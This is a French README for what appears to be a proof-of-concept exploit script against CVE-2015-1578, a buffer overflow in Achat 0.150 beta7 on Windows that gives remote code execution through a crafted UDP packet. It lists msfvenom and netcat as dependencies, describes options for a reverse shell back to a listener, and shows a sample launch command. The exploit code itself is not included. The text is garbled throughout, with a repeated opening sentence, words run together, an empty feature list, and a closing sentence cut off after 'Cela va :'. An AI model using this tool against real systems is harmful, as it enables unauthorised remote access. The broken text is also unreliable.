
Ceci est un exploit proof-of-concept pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sous Windows. L'exploitation conduit à une exécution de code à distance via un paquet UDP conçu.
Ceci est une preuve de concept d'exploit pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sous Windows. L'exploitation conduit à une exécution de code à distance via un paquet UDP conçu.
Ce PoC a pour but de servir d'exemple propre, minimal et bien structuré de développement d'exploit. Il démontre :
msfvenommsfvenom (partie du Framework Metasploit)rlwrap (pour une utilisation améliorée de Netcat)msfvenomrlwrap nc-i <ip_cible> Adresse IP cible (obligatoire)
-l, --lhost <ip_ecouteur> IP hôte local pour le shell inverse (obligatoire)
-p, --lport <port> Port local pour le shell inverse (obligatoire)
--rport <port> Port UDP distant sur la cible (par défaut : 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Cela va :